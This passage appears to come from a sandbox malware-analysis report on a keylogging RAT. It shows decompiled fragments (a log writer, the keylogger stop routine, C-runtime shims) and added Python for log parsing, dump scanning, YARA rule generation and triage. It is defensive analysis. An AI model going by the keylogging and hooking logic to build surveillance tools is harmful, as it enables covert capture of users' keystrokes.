					E00401F98();
				}
				E00401F98();                                    /* remaining two calls, presumably for _a4 and _a28 */
				return E00401F98();
			}
Addresses: 0x00417d08 0x00417d0b 0x00417d12 0x00417d1c 0x00417d2b 0x00417d36 0x00417d3c 0x00417d87 0x00417d93 0x00417d9c 0x00417da5 0x00417dae 0x00417dae 0x00417db6 0x00417dc6

APIs
• GetLocalTime.KERNEL32(00000000), ref: 00417D1C
Strings
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID: | $%02i:%02i:%02i:%03i
• API String ID: 481472006-2430845779
• Opcode ID: e2fc3714e46cfe4ae8f024277b9f494fedb76d0f10c35188f481b69de4a35aa8
• Instruction ID: 89e6fcd4fc950140904961122ce4607a260e5f64111333bcb5c22845690591d3
• Opcode Fuzzy Hash: e2fc3714e46cfe4ae8f024277b9f494fedb76d0f10c35188f481b69de4a35aa8
• Instruction Fuzzy Hash: E6118E715082095AC304FB66D8518BFB3E8AB8574CF10093FB485920E1EF3CEA85C65A
Uniqueness

Uniqueness Score: -1.00%
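The layout recovered from E00417D02 (a "%02i:%02i:%02i:%03i " prefix, " | " between fields and "\n" as terminator) is enough to parse log lines written in this format when they turn up in a dump or a recovered keylog. The following Python is an added example, not code from the sample or from the Joe Sandbox report: the sample lines are constructed for the example, and the assumption that the text after the timestamp is split on the exact string " | " (rather than some other spacing) comes from the two string constants listed above. It also rejects lines whose clock fields cannot come from GetLocalTime.

```python
# Added example (not from the report): parser for the RAT's log-line layout.
import re
from datetime import time

# One line = "%02i:%02i:%02i:%03i " + fields joined by " | " + "\n",
# as recovered from E00417D02. The report does not fix the order of the
# fields after the timestamp, so they are returned as a list.
LINE_RE = re.compile(r"^(\d{2}):(\d{2}):(\d{2}):(\d{3}) (.*)$")


def parse_line(line):
    """Return (datetime.time, [fields]) or None if the line is not in the format."""
    m = LINE_RE.match(line.rstrip("\r\n"))
    if m is None:
        return None
    h, mi, s, ms = (int(g) for g in m.groups()[:4])
    try:
        stamp = time(h, mi, s, ms * 1000)      # %03i is milliseconds
    except ValueError:                         # e.g. hour 25: not a GetLocalTime value
        return None
    fields = [f.strip() for f in m.group(5).split(" | ")]
    return stamp, fields


def parse_log(text):
    """Split text into accepted (line_no, (time, fields)) and rejected (line_no, raw)."""
    accepted, rejected = [], []
    for n, raw in enumerate(text.splitlines(), 1):
        parsed = parse_line(raw)
        if parsed is None:
            rejected.append((n, raw))
        else:
            accepted.append((n, parsed))
    return accepted, rejected


# Constructed sample: the layout follows the report, the contents are made up.
SAMPLE_LOG = (
    "14:03:27:512 Online Keylogger Stopped | \n"
    "14:03:27:530 Connection KeepAlive | Enabled | Timeout: 60\n"
    "stray text with no timestamp\n"
    "25:61:00:000 bad clock | x\n"
)

if __name__ == "__main__":
    ok, bad = parse_log(SAMPLE_LOG)
    for n, (stamp, fields) in ok:
        print(n, stamp.isoformat(timespec="milliseconds"), fields)
    for n, raw in bad:
        print(n, "REJECTED", raw)
```

Keeping the rejected lines (rather than dropping them) matters in practice: in a carved region of a memory dump the lines that fail the format are usually where the buffer boundary or a partially overwritten entry sits.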

C-Code - Quality: 95%
			/* Editorial reading (not part of the Joe Sandbox output): a buffer-growth
			   helper from the statically linked C runtime, not RAT logic. The object in
			   __ecx carries a 0x400-byte inline buffer, its current capacity at +0x400
			   and a heap pointer at +0x404. For a request of _a4 wide characters the
			   routine first checks that _a4 * 2 cannot overflow; on failure it stores
			   0xc (ENOMEM) through the pointer returned by E00439941 (errno) and
			   returns 0. A request that fits the inline buffer, or the heap block
			   already held, returns 1 without allocating; a larger one allocates with
			   E004421F7, installs the block through E0043B76C, records the new capacity
			   and frees the displaced block with E004427C2 (a null pointer when the
			   allocation failed). The "// 0x46e278" annotations are pointer values the
			   decompiler observed at run time. */
			E0043B324(signed int __eax, char _a4) {
				char _v8;
				void* __ecx;
				char _t17;
				void* _t19;
				void* _t24;
				void* _t26;
				void* _t33;
				signed int _t36;
				intOrPtr _t37;

				_push(_t26);
				_t1 =  &_a4; // 0x46e278
				_t36 =  *_t1;                                    /* requested element count */
				_t33 = _t26;                                     /* this */
				if(((__eax | 0xffffffff) / _t36 & 0xfffffffe) >= 2) {   /* 0xffffffff / count >= 2: count * 2 fits in 32 bits */
					_t24 = 0;
					_t37 = _t36 + _t36;                          /* byte size for wide characters */
					if( *((intOrPtr*)(_t33 + 0x404)) != 0 || _t37 > 0x400) {   /* already on the heap, or too big for the inline buffer */
						if(_t37 >  *((intOrPtr*)(_t33 + 0x400))) {             /* larger than the current capacity: grow */
							_t17 = E004421F7(_t26, _t37);
							_v8 = _t17;
							if(_t17 != 0) {
								_t9 =  &_v8; // 0x46e278
								E0043B76C(_t33 + 0x404, _t9);    /* swap the new block in, old pointer lands in _v8 */
								_t11 =  &_v8; // 0x46e278
								_t17 =  *_t11;
								_t24 = 1;
								 *((intOrPtr*)(_t33 + 0x400)) = _t37;
							}
							E004427C2(_t17);                     /* free the displaced block (or null) */
							_t19 = _t24;
						} else {
							goto L5;
						}
					} else {
						L5:
						_t19 = 1;                                /* current buffer is large enough */
					}
				} else {
					 *((intOrPtr*)(E00439941())) = 0xc;          /* errno = ENOMEM */
					_t19 = 0;
				}
				return _t19;
			}
Addresses: 0x0043b329 0x0043b330 0x0043b330 0x0043b339 0x0043b33e 0x0043b350 0x0043b352 0x0043b35a 0x0043b36a 0x0043b371 0x0043b376 0x0043b37c 0x0043b37e 0x0043b388 0x0043b38d 0x0043b38d 0x0043b390 0x0043b392 0x0043b392 0x0043b399 0x0043b39f 0x00000000 0x00000000 0x00000000 0x0043b36c 0x0043b36c 0x0043b36c 0x0043b36c 0x0043b340 0x0043b345 0x0043b34b 0x0043b34b 0x0043b3a7

Strings
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID:
• String ID: xF$xFxF
• API String ID: 0-3219568436
• Opcode ID: 36dc461da3d18a29690d951121a1427297259d6985ffabe716b0f978ac397d90
• Instruction ID: 214312334eb7d190aea148d3e0b0366e374d0c74fc2516f3d51057bcaead4159
• Opcode Fuzzy Hash: 36dc461da3d18a29690d951121a1427297259d6985ffabe716b0f978ac397d90
• Instruction Fuzzy Hash: F901D8B2905524AAD720AA6988417DBB758EB86334F24522BEF2457240CB386D0296EC
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%
			/* Editorial reading (not part of the Joe Sandbox output): the keylogger
			   stop path. The object in __ecx holds the keyboard HHOOK at offset 0, a
			   handle at index 0xf (offset 0x3c), a running flag at index 0x12
			   (offset 0x48) and an enable byte at offset 0x4a. With the enable byte
			   clear the routine returns 0 and touches nothing. Otherwise it logs
			   "Online Keylogger Stopped" (through E004097F2, which the APIs list shows
			   calling GetLocalTime and wsprintfW, and through the timestamped writer
			   E00417D02), clears the flag, closes the handle and removes the global
			   hook with UnhookWindowsHookEx, undoing the hook behind the "Installs a
			   global keyboard hook" signature. The three E00402053 calls with shuffled
			   arguments, one with a 64-bit displacement (0xffffffffffffffe8) in 32-bit
			   code, are rendered inconsistently by the decompiler and should be checked
			   against the disassembly before being read as three separate messages;
			   the test of _t30[0x12] immediately after it is set to 0 is likewise a
			   decompilation artifact. */
			E004096DC(void* __ebx, struct HHOOK__** __ecx, void* __edx) {
				char _v28;
				void* __edi;
				void* __ebp;
				struct HHOOK__** _t30;
				void* _t31;
				void* _t32;

				_t30 = __ecx;
				_t37 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {             /* keylogger not enabled */
					__eflags = 0;
					return 0;
				}
				E00402053(__ebx,  &_v28, __edx, _t31, "Online Keylogger Stopped");
				E00418385(_t32 - 0x18,  &_v28);
				E004097F2(__ebx, _t30, _t37);                    /* writes the stop message (GetLocalTime / wsprintfW) */
				E00401F98();
				E00402053(__ebx, _t32,  &_v28, _t31, "Online Keylogger Stopped");
				E00402053(__ebx, _t32 - 0xffffffffffffffe8,  &_v28, _t31, "i");
				E00417D02(__ebx, "Online Keylogger Stopped");    /* timestamped status line */
				_t30[0x12] = 0;                                  /* running flag off */
				CloseHandle(_t30[0xf]);                          /* handle at offset 0x3c, presumably the keylog file */
				if(_t30[0x12] == 0 &&  *_t30 != 0) {
					UnhookWindowsHookEx( *_t30);                 /* remove the global keyboard hook */
					 *_t30 =  *_t30 & 0x00000000;
				}
				return 1;
			}
Addresses: 0x004096e3 0x004096e6 0x004096ea 0x0040975f 0x00000000 0x0040975f 0x004096f5 0x00409702 0x00409709 0x00409711 0x0040971c 0x0040972b 0x00409730 0x00409738 0x0040973f 0x00409749 0x00409752 0x00409758 0x00409758 0x00000000

APIs
  • Part of subcall function 004097F2: GetLocalTime.KERNEL32(?,?,00000000), ref: 00409800
  • Part of subcall function 004097F2: wsprintfW.USER32 ref: 00409881
  • Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C
• CloseHandle.KERNEL32(?), ref: 0040973F
• UnhookWindowsHookEx.USER32 ref: 00409752
Strings
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
• API String ID: 1623830855-1496645233
• Opcode ID: 9edb5f2ab6d44894719fbf0563ddd7c58490609237b409b0b22dc7608c80f927
• Instruction ID: 7e321632cec19d9aa86b0227ffdc8ed11ca75d2f03b3d160f1c10071a82b211e
• Opcode Fuzzy Hash: 9edb5f2ab6d44894719fbf0563ddd7c58490609237b409b0b22dc7608c80f927
• Instruction Fuzzy Hash: 1101F5316042149BD7217B69C80B7BE7BB14B42304F40046FE941225D3DBB9189687DA
Uniqueness

Uniqueness Score: -1.00%
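The string constants the report attributes to these routines ("Online Keylogger Stopped" here, "Connection KeepAlive | Enabled | Timeout: " and "%02i:%02i:%02i:%03i " in the functions above) are the kind of markers a responder would look for in the memory dump the report references. The following Python is an added example, not part of the report or of the sample: it scans a byte buffer for those markers in both narrow and UTF-16LE form (the sample uses narrow string constants here but also wsprintfW elsewhere, so both encodings are worth checking), reports the offsets, and renders the same markers as a YARA rule body. The dump bytes are constructed for the example, and the rule name is made up.

```python
# Added example (not from the report): marker scan over a memory dump.
MARKERS = [
    "Online Keylogger Stopped",
    "Connection KeepAlive | Enabled | Timeout: ",
    "%02i:%02i:%02i:%03i ",
]
ENCODINGS = ("ascii", "utf-16-le")   # narrow and "wide" string forms


def find_markers(buf, markers=MARKERS):
    """Map each marker found in buf to a list of (offset, encoding) hits, in offset order."""
    hits = {}
    for marker in markers:
        found = []
        for enc in ENCODINGS:
            needle = marker.encode(enc)
            pos = buf.find(needle)
            while pos != -1:
                found.append((pos, enc))
                pos = buf.find(needle, pos + 1)
        if found:
            hits[marker] = sorted(found)
    return hits


def distinct_markers(hits):
    """Number of different markers present; two or more is a reasonable triage threshold."""
    return len(hits)


def to_yara(markers=MARKERS, name="remcos_log_strings", min_hits=2):
    """Render the markers as a YARA rule requiring min_hits distinct strings (ascii + wide)."""
    lines = [f"rule {name} {{", "    strings:"]
    for i, marker in enumerate(markers):
        esc = marker.replace("\\", "\\\\").replace('"', '\\"')
        lines.append(f'        $s{i} = "{esc}" ascii wide')
    lines += ["    condition:", f"        {min_hits} of ($s*)", "}"]
    return "\n".join(lines)


# Constructed dump: zero padding, a narrow copy, a UTF-16LE copy and the format
# string. These bytes are made up for the example, not taken from the sample.
SAMPLE_DUMP = (
    b"\x00" * 32
    + b"Online Keylogger Stopped\x00"
    + b"\x90" * 16
    + "Online Keylogger Stopped".encode("utf-16-le") + b"\x00\x00"
    + b"%02i:%02i:%02i:%03i \x00"
    + b"MZ" * 8
)

if __name__ == "__main__":
    found = find_markers(SAMPLE_DUMP)
    for marker, where in found.items():
        print(f"{marker!r}: {where}")
    print("distinct markers:", distinct_markers(found))
    print(to_yara())
```

Running it over the .sdmp file named under Memory Dump Source (read as bytes) gives the offsets to pivot from in the disassembly; the "ascii wide" modifiers in the generated rule cover the same two encodings the scanner checks.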

C-Code - Quality: 28%
			/* Editorial reading (not part of the Joe Sandbox output): a C-runtime
			   locale thunk, not RAT logic; the shape matches the MSVC CRT wrapper
			   around LCMapStringEx. E0044450A resolves LCMapStringEx (table slot 0x16)
			   at run time; when it is unavailable (pre-Vista) the call falls back to
			   LCMapStringW, with E00444C7B mapping the locale name in _a4 to an LCID.
			   _v8 is the /GS stack cookie (*0x46c00c xor the frame pointer) and
			   E004318FB its check. The call through *0x4544b0 immediately before the
			   indirect call *_t31() is how the decompiler renders the Control Flow
			   Guard indirect-call check: the arguments are pushed, the target is
			   validated, then called. */
			E00444BF3(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t31;
				signed int _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0x46c00c; // 0xe1ce05e9
				_v8 = _t18 ^ _t33;                               /* stack cookie */
				_push(__esi);
				_t31 = E0044450A(0x16, "LCMapStringEx", 0x45a1a4, 0x45a1ac);   /* resolve LCMapStringEx */
				if(_t31 == 0) {
					LCMapStringW(E00444C7B(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);   /* fallback */
				} else {
					 *0x4544b0(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);   /* CFG check of _t31 */
					 *_t31();                                    /* LCMapStringEx(...) */
				}
				return E004318FB(_v8 ^ _t33);                    /* cookie check */
			}
Addresses: 0x00444bf3 0x00444bf8 0x00444bf9 0x00444c00 0x00444c03 0x00444c1a 0x00444c21 0x00444c64 0x00444c23 0x00444c40 0x00444c46 0x00444c46 0x00444c78

APIs
• LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,7EE85006,00000001,?,0043B80A), ref: 00444C64
Strings
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID: String
• String ID: <@$LCMapStringEx
• API String ID: 2568140703-2833201398
• Opcode ID: 587cf81ffef3e244f9899e0bc30bc131852856dba3666bcef6d8c1040c924b34
• Instruction ID: 513e971d3886a3402e30ab39f8972ab9fa096b8d06a9c0a985b9a8e1eafc5c8a
• Opcode Fuzzy Hash: 587cf81ffef3e244f9899e0bc30bc131852856dba3666bcef6d8c1040c924b34
• Instruction Fuzzy Hash: 5B012532640209BBDF026F90DD06EEE3F62FF48755F054115FE0526161C63A8931AB99
Uniqueness

Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 28%
                                                                      			E004448AB(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, struct _SYSTEMTIME* _a12, short* _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                      				signed int _v8;
                                                                      				signed int _t16;
                                                                      				intOrPtr* _t29;
                                                                      				signed int _t31;
                                                                      
                                                                      				_t24 = __ecx;
                                                                      				_push(__ecx);
                                                                      				_t16 =  *0x46c00c; // 0xe1ce05e9
                                                                      				_v8 = _t16 ^ _t31;
                                                                      				_push(__esi);
                                                                      				_t29 = E0044450A(9, "GetDateFormatEx", 0x45a120, "GetDateFormatEx");
                                                                      				if(_t29 == 0) {
                                                                      					GetDateFormatW(E00444C7B(_t24, _t29, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
                                                                      				} else {
                                                                      					 *0x4544b0(_a4, _a8, _a12, _a16, _a20, _a24, _a28);
                                                                      					 *_t29();
                                                                      				}
                                                                      				return E004318FB(_v8 ^ _t31);
                                                                      			}

Instruction addresses (one per decompiled line, in order): 0x004448ab 0x004448b0 0x004448b1 0x004448b8 0x004448bb 0x004448d2 0x004448d9 0x00444916 0x004448db 0x004448f2 0x004448f8 0x004448f8 0x0044492a

                                                                      APIs
                                                                      • GetDateFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00443B28,?,00000000,00401D15), ref: 00444916
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DateFormat
                                                                      • String ID: <@$GetDateFormatEx
                                                                      • API String ID: 2793631785-272301589
                                                                      • Opcode ID: 15fde99c9577bddff0e4f784a6e0f3e9d99a3a90bcb723ab1f2833a90943fbff
                                                                      • Instruction ID: ddae53e56973792dd7788399c133b45101b4a0e15b019066735eba3cdb65be00
                                                                      • Opcode Fuzzy Hash: 15fde99c9577bddff0e4f784a6e0f3e9d99a3a90bcb723ab1f2833a90943fbff
                                                                      • Instruction Fuzzy Hash: 9A015A32640209FBCF026FA1DC05EAE3F62EF58715F004116FE0525162CA7AC931AB99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetTimeFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00443B28,?,00000000,00401D15), ref: 00444A46
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FormatTime
                                                                      • String ID: <@$GetTimeFormatEx
                                                                      • API String ID: 3606616251-2103072910
                                                                      • Opcode ID: 096621559bc0869c113643be2c38f5202b54958452a416738b7a9735e2bf5c38
                                                                      • Instruction ID: 7cbeb7a207a8dfe85555685c10a66d686a9da7b5cc68718d42f48047cfdc97e6
                                                                      • Opcode Fuzzy Hash: 096621559bc0869c113643be2c38f5202b54958452a416738b7a9735e2bf5c38
                                                                      • Instruction Fuzzy Hash: F7F02231640208BBCF01AFA4DC02FAF7F61EF48701F00411AFC0126262DA398D30AB8E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 39%
                                                                      			E00444A5D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                      				signed int _v8;
                                                                      				signed int _t7;
                                                                      				void* _t20;
                                                                      				intOrPtr* _t23;
                                                                      				signed int _t25;
                                                                      
                                                                      				_t20 = __edx;
                                                                      				_t16 = __ecx;
                                                                      				_push(__ecx);
                                                                      				_t7 =  *0x46c00c; // 0xe1ce05e9
                                                                      				_v8 = _t7 ^ _t25;
                                                                      				_t23 = E0044450A(0x11, "GetUserDefaultLocaleName", 0x45a15c, "GetUserDefaultLocaleName");
                                                                      				if(_t23 == 0) {
                                                                      					E00444B89(__ebx, _t16, _t20, __edi, _t23, __eflags, GetUserDefaultLCID(), _a4, _a8, 0);
                                                                      				} else {
                                                                      					 *0x4544b0(_a4, _a8);
                                                                      					 *_t23();
                                                                      				}
                                                                      				return E004318FB(_v8 ^ _t25);
                                                                      			}

Instruction addresses (one per decompiled line, in order): 0x00444a5d 0x00444a5d 0x00444a62 0x00444a63 0x00444a6a 0x00444a84 0x00444a8b 0x00444aae 0x00444a8d 0x00444a95 0x00444a9b 0x00444a9b 0x00444ac1

                                                                      APIs
                                                                      • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,0044D379,?,00000055,00000050), ref: 00444AA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DefaultUser
                                                                      • String ID: <@$GetUserDefaultLocaleName
                                                                      • API String ID: 3358694519-597523428
                                                                      • Opcode ID: 38195256cd39f04bc9c47b2cf2396dbf21144f877f4cbd5bd6f49ffb4f9b8da6
                                                                      • Instruction ID: 027227ebeadc9ad68dd3942aef22f44cd9bb21f1684cd6373b062cd38244330f
                                                                      • Opcode Fuzzy Hash: 38195256cd39f04bc9c47b2cf2396dbf21144f877f4cbd5bd6f49ffb4f9b8da6
                                                                      • Instruction Fuzzy Hash: C6F0B431640708B7DF106FA5DC06FAEBFA4DB84725F104126FE056A252CA798D21D79D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 25%
                                                                      			E00444B26(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _t5;
                                                                      				intOrPtr* _t18;
                                                                      				signed int _t20;
                                                                      
                                                                      				_t13 = __ecx;
                                                                      				_push(__ecx);
                                                                      				_t5 =  *0x46c00c; // 0xe1ce05e9
                                                                      				_v8 = _t5 ^ _t20;
                                                                      				_push(__esi);
                                                                      				_t18 = E0044450A(0x15, "IsValidLocaleName", 0x45a188, "IsValidLocaleName");
                                                                      				if(_t18 == 0) {
                                                                      					IsValidLocale(E00444C7B(_t13, _t18, __eflags, _a4, 0), 1);
                                                                      				} else {
                                                                      					 *0x4544b0(_a4);
                                                                      					 *_t18();
                                                                      				}
                                                                      				return E004318FB(_v8 ^ _t20);
                                                                      			}

Instruction addresses (one per decompiled line, in order): 0x00444b26 0x00444b2b 0x00444b2c 0x00444b33 0x00444b36 0x00444b4d 0x00444b54 0x00444b72 0x00444b56 0x00444b5b 0x00444b61 0x00444b61 0x00444b86

                                                                      APIs
                                                                      • IsValidLocale.KERNEL32(00000000,00440BAA,00000000,00000001,?,?,00440BAA,?,?,0044058A,?,00000004), ref: 00444B72
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LocaleValid
                                                                      • String ID: <@$IsValidLocaleName
                                                                      • API String ID: 1901932003-228239127
                                                                      • Opcode ID: 59e0366fc6285e0e7ebe33bdf367bbf640cacc9d2b59f086446dc4af0344ae2a
                                                                      • Instruction ID: fc1e9917d0503259b9fad8b5fdc24ac45d3e3552dfba05d1d4e36143618bbe60
                                                                      • Opcode Fuzzy Hash: 59e0366fc6285e0e7ebe33bdf367bbf640cacc9d2b59f086446dc4af0344ae2a
                                                                      • Instruction Fuzzy Hash: 00F05230B80708B7DA01AB209C06F6E7B94CB94B12F01022AFC056A281DEB89D21828E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 20%
                                                                      			E00444AC4(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
                                                                      				signed int _v8;
                                                                      				signed int _t8;
                                                                      				intOrPtr* _t20;
                                                                      				signed int _t22;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_t8 =  *0x46c00c; // 0xe1ce05e9
                                                                      				_v8 = _t8 ^ _t22;
                                                                      				_t20 = E0044450A(0x14, "InitializeCriticalSectionEx", 0x45a180, 0x45a188);
                                                                      				if(_t20 == 0) {
                                                                      					InitializeCriticalSectionAndSpinCount(_a4, _a8);
                                                                      				} else {
                                                                      					 *0x4544b0(_a4, _a8, _a12);
                                                                      					 *_t20();
                                                                      				}
                                                                      				return E004318FB(_v8 ^ _t22);
                                                                      			}

Instruction addresses (one per decompiled line, in order): 0x00444ac9 0x00444aca 0x00444ad1 0x00444aeb 0x00444af2 0x00444b0f 0x00444af4 0x00444aff 0x00444b05 0x00444b05 0x00444b23

                                                                      APIs
                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,00469540,0044C0A3,00469540,0000001C,0045199C,?,FF8BC35D,00000000,?,?,?,00451378,00000000,?,FF8BC35D), ref: 00444B0F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CountCriticalInitializeSectionSpin
                                                                      • String ID: <@$InitializeCriticalSectionEx
                                                                      • API String ID: 2593887523-2499258444
                                                                      • Opcode ID: e3263271de35c631500a721dd5c8f31e291f44fcfa39974c8e02659b01e43a37
                                                                      • Instruction ID: 26a372422aa0317cbc49aa043b53a39363b59b14f8d952c282d93c71cfe08ab9
                                                                      • Opcode Fuzzy Hash: e3263271de35c631500a721dd5c8f31e291f44fcfa39974c8e02659b01e43a37
                                                                      • Instruction Fuzzy Hash: 52F0243064020CFBCF016F50DC01EAE7F60EB44752F004226FC051A261DA758D21969A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
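The five functions above (E004448AB, E00444A5D, E00444B26, E00444AC4 and, further down, E00444750) share one shape: a call to E0044450A with a small index and an API name, an indirect call through the resolved pointer when it is found, and an older API (GetDateFormatW, GetUserDefaultLCID, IsValidLocale, InitializeCriticalSectionAndSpinCount, TlsAlloc) when it is not. That is the shape of the MSVC CRT's downlevel-API shims, statically linked into the unpacked payload; the value read from 0x46c00c, xored with the frame and re-checked through E004318FB on return, and the indirect call through 0x4544b0 immediately before `*_t29()` are consistent with the compiler's /GS stack-cookie and Control Flow Guard checks. None of this is sample-specific behaviour, and an analyst reading a report of this size wants to filter it out. The following helper is an added example, not part of the report or of the sample: it parses the "C-Code - Quality", "APIs" and "String ID" lines of report blocks like the ones on this page and flags blocks that match the shim pattern. The fallback table is taken from the blocks on this page and is assumed, not a complete list of CRT thunks; the embedded sample text is a constructed abridgement of two blocks from this page.

```python
"""
Triage helper for Joe Sandbox decompiled-function blocks.  Added example:
not part of the report and not the sample's code.
"""
import re
from dataclasses import dataclass, field

# Each shim resolves a newer export by name and falls back to an older API.
# Pairs taken from the blocks on this page; assumed, not a complete CRT list.
DOWNLEVEL_FALLBACKS = {
    "GetDateFormatEx": "GetDateFormatW",
    "GetTimeFormatEx": "GetTimeFormatW",
    "GetUserDefaultLocaleName": "GetUserDefaultLCID",
    "IsValidLocaleName": "IsValidLocale",
    "InitializeCriticalSectionEx": "InitializeCriticalSectionAndSpinCount",
    "FlsAlloc": "TlsAlloc",
}

HEADER_RE = re.compile(r"^C-Code - Quality: (\d+)%[ \t]*$", re.M)
FUNC_RE = re.compile(r"\b(E[0-9A-F]{8})\(")
API_RE = re.compile(r"•\s+(Part of subcall function [0-9A-F]+:\s+)?(\w+)\.(\w+)\(")
STRING_RE = re.compile(r"•\s+String ID:\s*(.*)")


@dataclass
class FuncBlock:
    name: str
    quality: int
    direct_apis: list = field(default_factory=list)   # "Api.MODULE" called by the function
    subcall_apis: list = field(default_factory=list)  # "Api.MODULE" from "Part of subcall"
    strings: list = field(default_factory=list)       # String ID entries, split on '$'


def parse_blocks(text):
    """Split report text on the 'C-Code - Quality' headers, one FuncBlock per function."""
    parts = HEADER_RE.split(text)          # ['', quality, body, quality, body, ...]
    blocks = []
    for quality, body in zip(parts[1::2], parts[2::2]):
        m = FUNC_RE.search(body)           # first E<addr>( is the function's own name
        if m is None:
            continue
        fb = FuncBlock(name=m.group(1), quality=int(quality))
        for subcall, api, module in API_RE.findall(body):
            (fb.subcall_apis if subcall else fb.direct_apis).append(f"{api}.{module}")
        sm = STRING_RE.search(body)
        if sm:
            fb.strings = [s for s in sm.group(1).split("$") if s]
        blocks.append(fb)
    return blocks


def classify(fb):
    """'crt_thunk' when a string is a shim name and the only direct API is its fallback."""
    direct = {a.split(".")[0] for a in fb.direct_apis}
    for s in fb.strings:
        fallback = DOWNLEVEL_FALLBACKS.get(s)
        # An empty direct set also counts: the FlsAlloc block lists no API at all.
        if fallback is not None and direct <= {fallback}:
            return "crt_thunk"
    return "sample_code"


def triage(text):
    """Map every function name in the report text to its label."""
    return {b.name: classify(b) for b in parse_blocks(text)}


# Constructed abridgement of two blocks from this page, used as sample input.
SAMPLE_REPORT = """\
C-Code - Quality: 25%
            E00444B26(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
                _t18 = E0044450A(0x15, "IsValidLocaleName", 0x45a188, "IsValidLocaleName");
                if(_t18 == 0) {
                    IsValidLocale(E00444C7B(_t13, _t18, __eflags, _a4, 0), 1);
                }
            }
APIs
• IsValidLocale.KERNEL32(00000000,00440BAA,00000000,00000001), ref: 00444B72
Similarity
• API ID: LocaleValid
• String ID: <@$IsValidLocaleName
C-Code - Quality: 65%
            E00409CD4(void* __ebx, void* __ecx, void* __edx) {
                _t12 = GetKeyState(0x11) & 0x0000ffff;
            }
APIs
• GetKeyState.USER32(00000011), ref: 00409CD9
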